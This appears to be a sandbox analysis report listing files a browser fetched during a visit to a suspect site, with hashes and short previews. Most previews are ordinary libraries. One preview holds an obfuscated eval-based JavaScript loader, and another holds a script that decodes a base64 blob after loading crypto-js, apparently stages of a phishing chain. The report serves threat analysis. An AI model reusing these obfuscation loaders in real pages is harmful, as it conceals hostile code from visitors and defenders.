                                                    SHA-256:3273FBC5B0B3F10FA0E78AC5DE8C397606FAE0068583B671C8C695F71F2446E4
                                                    SHA-512:98E3CF6F75B9A97F319AD15B82064A995C5265FC9AE0FAA29AF765BF69CA9664C4ED2324FC028F817C3F108B58329677A7EC16312C095824FD10680C53946370
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://yancesybros.com/favicon.ico
                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="utf-8">.. <meta http-equiv="x-ua-compatible" content="ie=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.. <title>404 Not Found</title>.. <style>html{overflow-y:scroll;color:#000;font:400 62.5%/1.4 "Helvetica Neue",Helvetica,Arial,sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;-webkit-tap-highlight-color:transparent}body,html{height:100%;min-height:100%}body{margin:0;font-size:1.3rem;background:#fff;color:#000}a{cursor:pointer;text-decoration:none;color:#2498e3;background-color:transparent}a:active,a:hover{text-decoration:underline;color:#188dd9;outline:0}h1,h2{margin:0 0 .5rem;color:#444;font-weight:400;line-height:1}h1{font-size:2.4rem}h2{font-size:3.6rem}.error-code{color:#f47755;font-size:8rem;line-height:1}p{margin:1.2rem 0}p.lead{font-size:1.6rem;color:#4f5a64}hr{box-sizing:content-box;height:0;margin:2.4rem 0;border:0;border-top:1px solid #ddd}.page
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):16
                                                    Entropy (8bit):3.5
                                                    Encrypted:false
                                                    SSDEEP:3:H+rYn:D
                                                    MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                    SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                    SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                    SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmPzJOEtLKWYRIFDTcwqTA=?alt=proto
                                                    Preview:CgkKBw03MKkwGgA=
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65447)
                                                    Category:dropped
                                                    Size (bytes):89501
                                                    Entropy (8bit):5.289893677458563
                                                    Encrypted:false
                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 3396 x 1920, 8-bit/color RGB, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):87859
                                                    Entropy (8bit):7.046777034066421
                                                    Encrypted:false
                                                    SSDEEP:1536:k4iIwz9HmGeKV5FrZuUDPA3Ae3ItuR30nAVO4P88D6s:piIkGZ+ZsJ4YR30ePHD6s
                                                    MD5:A4D9107960AE4E4F79E6A36DF931EF5D
                                                    SHA1:35704C698FCCD795B8F19DA76672A72C00422857
                                                    SHA-256:FBBBC78E85DFA4F2B390E6DC2F3850D0F5247D16B5FD525093331572AA79AE84
                                                    SHA-512:2C7FB7F198B0B141DD5B2B72ECB8B6E00514B70DFDE8CF6161988A5BB4F26C72BEED5CB59EC9E80BB2651016999D7DBB1CEE73F18AF7A982A0F3AC73E9B02465
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png
                                                    Preview:.PNG........IHDR...D.........3;+.....sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(..........Y..)....O..h.-... .IDATx...!.. ..0..X..I.................@g............;3............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2295)
                                                    Category:downloaded
                                                    Size (bytes):7658
                                                    Entropy (8bit):4.03643771896613
                                                    Encrypted:false
                                                    SSDEEP:96:FJOZ1yG7fSWRDvaoxzHwg1xA/IG52jyGFqG/72/wMu+qGK2uTNIhD5gDigLrCLnM:FYZ1y9ijjyRb/wMi/2uTNoGDrinx/a
                                                    MD5:60A27F60777CE68A53A08FD5EFF7B35F
                                                    SHA1:B8297FBD197760FE72F40E34A561FB952FCC03A6
                                                    SHA-256:B479F876EEFC2AE8ADEF554B93A69624BFBBDEB8C48EBD6036B17B1C661E010F
                                                    SHA-512:A349F42929A20987B6A9B1ADE5D53935FE1B5CC143312EF99D5A403AA086620D1616AE3EF5A98DF0FDCCA1C0DB48596A6867262351EE3F415493E7623AE4D68F
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://yancesybros.com/WHF9842BVD.html
                                                    Preview:<html>.<head><meta charset="UTF-8"> <em> She tended to her flower garden with care. </em> --></head><body>.<script>.moray = '';..s="";for(let Px=0;Px<4**7;++Px)Reflect.defineProperty(self,[...Px.toString(4).padStart(7)].map(n=>"...."[+n]).join(""),{get(){ Px?s+=String.fromCharCode(Px>>7,Px&127):eval(s)}});........;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):61
                                                    Entropy (8bit):3.990210155325004
                                                    Encrypted:false
                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (47694)
                                                    Category:dropped
                                                    Size (bytes):47695
                                                    Entropy (8bit):5.401533135534308
                                                    Encrypted:false
                                                    SSDEEP:768:IXCtQmIutwVHozZBF6gmXLSOzQDjdadOQbk6sgEvxm7b39tobLKZUenw81KZLGcD:IGJWHozZBF6xbGeLsVvQ33FUeDW
                                                    MD5:481EDB6F4045F16980C920CCD9705105
                                                    SHA1:D8CB40ABC935DC65D25D83D8358F52AC88742F73
                                                    SHA-256:5F7C821EEA52471A9BBB0397DF6B77EE279505BE05BB52AEF00932989522D3C2
                                                    SHA-512:497484EF0BAB7D2F4ED38E8063D1BAED9C8B49775CCF490CFF0C2B9CE73265D8E5292DA9FCEEB22B4CED508B9930A6ADBB145E2E2DC458FAF67EBB706D3021D3
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 80 x 67, 8-bit/color RGB, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):61
                                                    Entropy (8bit):4.035372245524404
                                                    Encrypted:false
                                                    SSDEEP:3:yionv//thPlHstCNpBxl/k4E08up:6v/lhPyCLB7Tp
                                                    MD5:6BC0223EAE38200C56E51665462A5875
                                                    SHA1:6DE889A57088CDBC38F4F3F2ADF4148897102DC6
                                                    SHA-256:1AC02027DF9DBB4CB4E97E413ABCCE7A7FF6C1757D359AE04261B40F55814617
                                                    SHA-512:BB68EEAD5FD5675301F84DA9F17C8DDE2EFA1ADFB94BB8367B7D8DA9AFA4DAE6471A8F397567D0A9B106E2D4918595F18B9466F7A46F4EDBB1408AEF9CC7FBDE
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8e83c97ff9621a48/1732560240060/F7F6o63uyBc_7o8
                                                    Preview:.PNG........IHDR...P...C......1......IDAT.....$.....IEND.B`.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65447)
                                                    Category:downloaded
                                                    Size (bytes):89501
                                                    Entropy (8bit):5.289893677458563
                                                    Encrypted:false
                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (47992), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):47992
                                                    Entropy (8bit):5.605846858683577
                                                    Encrypted:false
                                                    SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                    MD5:CF3402D7483B127DED4069D651EA4A22
                                                    SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                    SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                    SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 80 x 67, 8-bit/color RGB, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):61
                                                    Entropy (8bit):4.035372245524404
                                                    Encrypted:false
                                                    SSDEEP:3:yionv//thPlHstCNpBxl/k4E08up:6v/lhPyCLB7Tp
                                                    MD5:6BC0223EAE38200C56E51665462A5875
                                                    SHA1:6DE889A57088CDBC38F4F3F2ADF4148897102DC6
                                                    SHA-256:1AC02027DF9DBB4CB4E97E413ABCCE7A7FF6C1757D359AE04261B40F55814617
                                                    SHA-512:BB68EEAD5FD5675301F84DA9F17C8DDE2EFA1ADFB94BB8367B7D8DA9AFA4DAE6471A8F397567D0A9B106E2D4918595F18B9466F7A46F4EDBB1408AEF9CC7FBDE
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:.PNG........IHDR...P...C......1......IDAT.....$.....IEND.B`.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (8108), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):8108
                                                    Entropy (8bit):5.747322000946088
                                                    Encrypted:false
                                                    SSDEEP:96:hI5wW/890pGAnWLRfLV5sAw9/vmb1E1RTvRckNJhbSGeXhPnz5nkP8O:W5wK89QWLRfLVCAwFvp1NruDJnEN
                                                    MD5:E118F24982C73AB98EC44ABD37B76DE8
                                                    SHA1:D2A81FCEA7EA254486AA49372B6D4B496DB9B83A
                                                    SHA-256:8B4142941D1EC6627491122B73DFD5AA74DF7CE20DE4BA776567D7500C6DDE43
                                                    SHA-512:DB09E0AFF6135963784327AC5240BCE1D6BA86212E59ACD441D1D9B139C78E414F2A2BF2FA1EAA78296B8BC6D63FEABF5542F3BCD8BA7FB254284C6CAFEBAA86
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,h,i,j,k,o,s,B){V=b,function(d,e,U,f,g){for(U=b,f=d();!![];)try{if(g=parseInt(U(285))/1+parseInt(U(235))/2+-parseInt(U(296))/3*(-parseInt(U(269))/4)+-parseInt(U(324))/5*(-parseInt(U(322))/6)+parseInt(U(267))/7+parseInt(U(326))/8+parseInt(U(265))/9*(-parseInt(U(240))/10),e===g)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,959728),h=this||self,i=h[V(258)],j={},j[V(318)]='o',j[V(319)]='s',j[V(238)]='u',j[V(311)]='z',j[V(259)]='n',j[V(309)]='I',j[V(278)]='b',k=j,h[V(273)]=function(g,D,E,F,a0,H,I,J,K,L,M){if(a0=V,null===D||void 0===D)return F;for(H=n(D),g[a0(253)][a0(261)]&&(H=H[a0(328)](g[a0(253)][a0(261)](D))),H=g[a0(255)][a0(313)]&&g[a0(239)]?g[a0(255)][a0(313)](new g[(a0(239))](H)):function(N,a1,O){for(a1=a0,N[a1(225)](),O=0;O<N[a1(325)];N[O]===N[O+1]?N[a1(252)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(247)][a0(264)](I),J=0;J<H[a0(325)];K=H[J],L=m(g,D,K),I(L)?(M='s'===L&&!g[a0(290)](D[K]),a0(314)===E+K?G(E+K,L):M||G(
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (47992), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):47992
                                                    Entropy (8bit):5.605846858683577
                                                    Encrypted:false
                                                    SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                    MD5:CF3402D7483B127DED4069D651EA4A22
                                                    SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                    SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                    SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (8016), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):8016
                                                    Entropy (8bit):5.754192498424974
                                                    Encrypted:false
                                                    SSDEEP:192:I4lRpHc5nStL2v3yGimC2QJ6uf2VLAi+rO4:H7p818L2v3yGimC2QPHO4
                                                    MD5:9CCEE306D2F6F30A23B1183A8062146A
                                                    SHA1:D1333822E5E7E5E2E061EA105B17F07F28565240
                                                    SHA-256:1BE05C0E0B660654D46291AB12D51F81ECE71F81677C5E2020EFCBE501E1CB3B
                                                    SHA-512:905B038125D58D58DDBBF217C770CB0C4005089B501330D32BC20D1C85C9A380DE5DAF483B5C04A922E6F1F25F12FBD5432D2E8AE31E4CBC41374BE4DFB9835D
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://yancesybros.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/e4025c85ea63/main.js?
                                                    Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,h,i,j,k,o,s,x){V=b,function(d,e,U,f,g){for(U=b,f=d();!![];)try{if(g=-parseInt(U(574))/1+parseInt(U(530))/2+-parseInt(U(522))/3+-parseInt(U(496))/4+parseInt(U(595))/5+-parseInt(U(585))/6+parseInt(U(583))/7,g===e)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,333276),h=this||self,i=h[V(494)],j={},j[V(506)]='o',j[V(537)]='s',j[V(586)]='u',j[V(558)]='z',j[V(588)]='n',j[V(503)]='I',j[V(591)]='b',k=j,h[V(495)]=function(g,D,E,F,a0,H,I,J,K,L,M){if(a0=V,null===D||void 0===D)return F;for(H=n(D),g[a0(547)][a0(519)]&&(H=H[a0(510)](g[a0(547)][a0(519)](D))),H=g[a0(540)][a0(548)]&&g[a0(497)]?g[a0(540)][a0(548)](new g[(a0(497))](H)):function(N,a1,O){for(a1=a0,N[a1(580)](),O=0;O<N[a1(581)];N[O+1]===N[O]?N[a1(572)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(551)][a0(554)](I),J=0;J<H[a0(581)];K=H[J],L=m(g,D,K),I(L)?(M='s'===L&&!g[a0(492)](D[K]),a0(542)===E+K?G(E+K,L):M||G(E+K,D[K])):G(E+K,L),J++);return F;function G(N,O,Z){Z=b,Object[Z(
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (47694)
                                                    Category:downloaded
                                                    Size (bytes):47695
                                                    Entropy (8bit):5.401533135534308
                                                    Encrypted:false
                                                    SSDEEP:768:IXCtQmIutwVHozZBF6gmXLSOzQDjdadOQbk6sgEvxm7b39tobLKZUenw81KZLGcD:IGJWHozZBF6xbGeLsVvQ33FUeDW
                                                    MD5:481EDB6F4045F16980C920CCD9705105
                                                    SHA1:D8CB40ABC935DC65D25D83D8358F52AC88742F73
                                                    SHA-256:5F7C821EEA52471A9BBB0397DF6B77EE279505BE05BB52AEF00932989522D3C2
                                                    SHA-512:497484EF0BAB7D2F4ED38E8063D1BAED9C8B49775CCF490CFF0C2B9CE73265D8E5292DA9FCEEB22B4CED508B9930A6ADBB145E2E2DC458FAF67EBB706D3021D3
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://challenges.cloudflare.com/turnstile/v0/g/e4025c85ea63/api.js?onload=iQmfw1&render=explicit
                                                    Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1321), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1959
                                                    Entropy (8bit):5.97420312512853
                                                    Encrypted:false
                                                    SSDEEP:48:07bvpekdc9Y0+CXx6jqxwzyuFDAFdAsZuIBbHrz:0XA68+m2qWyiDidAyuIFHf
                                                    MD5:9EFD4E4A3AB22C94DD51FA6DB21DD171
                                                    SHA1:1236C6BCCDBD203A4E228D3636D1A1BC9FAAA731
                                                    SHA-256:10872DF0EE502B86A9D0C09684B995B544BD225620382BB1F7DE77921D4800F1
                                                    SHA-512:F466835DA07539ECCF0845828DA423C02F0C6C3AD447C7824B3F778B3DCB78837C111D26D8501EF1B41B2D51AF0CA71A7E189EE1DFDC4255B82FEFCA6F8C9E3D
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: var VYNFcWtsUqmEPwWj = document.createElement("script");..VYNFcWtsUqmEPwWj.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(VYNFcWtsUqmEPwWj);..VYNFcWtsUqmEPwWj.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiNFlDbUU5K0pPWjBBcmZVekpMd0pPNFlvZG42a1c3STU2dUlsbFJ1RVJsNk8rdHZJaktGSklUOFdyalVmeTlnUm9ZejNTQ0NSazR6cU04K3dtWkpKT04rMFJReUJGYk9UOEsxam13TVpqYUVsSTZSZ3NuZTFDc3FvM1FMNWhyU0VSVmRFZStSZE85OWsrUjNkU3UzSFRyd2lodmlZVDhhREdNa1dUUGNrc2xmVDl4UGl6XC81YmJKN3BmTnJzUGU4N2NmOEJGN2VHZmJCckxDaFRuaXEzaFR5dk45UFlObUFKcWxsQjY2M201bXUrOHlYNHZsWjNPa3ZXREhwSk5Tb2tVRjRkVjQwY3ZybUxIOXJCc1A0T3p2ZHVPZTRKejFqdGZMQ2NUbkVZODlqU3lQTXJxQUNZM2dsbmVKMlBUY1Zlb0NcL25HVlB0cWY1c3VVaE9SS1BOYnUxTTV0SlJCUTlmaFA3K2hxM0w5YUtZQ0l1RUI1OXI3M0tLZ2JrODBtRU82RzNMbmpJMmIrcWU1Qk15XC9cL2pTUFRcL0U2S2ZyMjBPbWpLSjA2NSt2Wm9WQ0VVYVVYaUxmYkVzQTdWWnpSUWl4TGNmWkFZWFhVeFIzZ2lKUzdRNzFLVUJjN0ZuVDZLblhydGpBK09acjlHXC9JemF5SDNtY01UaWluVDZMMEVtaWhmR2VBdk9jRWdcLz
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (31789), with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):68397
                                                    Entropy (8bit):5.82128107036551
                                                    Encrypted:false
                                                    SSDEEP:1536:bdkIeeQv/UhcY2VIaX4GlitMpmfdkIeeQv/UhcY2VIaX4GlitMpm60a:bdk9FUhcNVUdk9FUhcNVF
                                                    MD5:748FDCF37ED4484A1DBEE14F4F4B8917
                                                    SHA1:729EC32D652649A61176AEDE9AECBB9907F39172
                                                    SHA-256:5E48D5840252835FF2BC1DC06F4CEEF879523BDC210F136362E9D2490684C4D2
                                                    SHA-512:D4607594890C25A339800E3CF1E8857A59F7A32C416910BFA7D7E1BBD870A61CC635EA9C9F3B8F6C03D09290813BA08198FA64C03C1F8A4D0702653935986B54
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://nl.nsiciumbe.com/aXqrQHt/
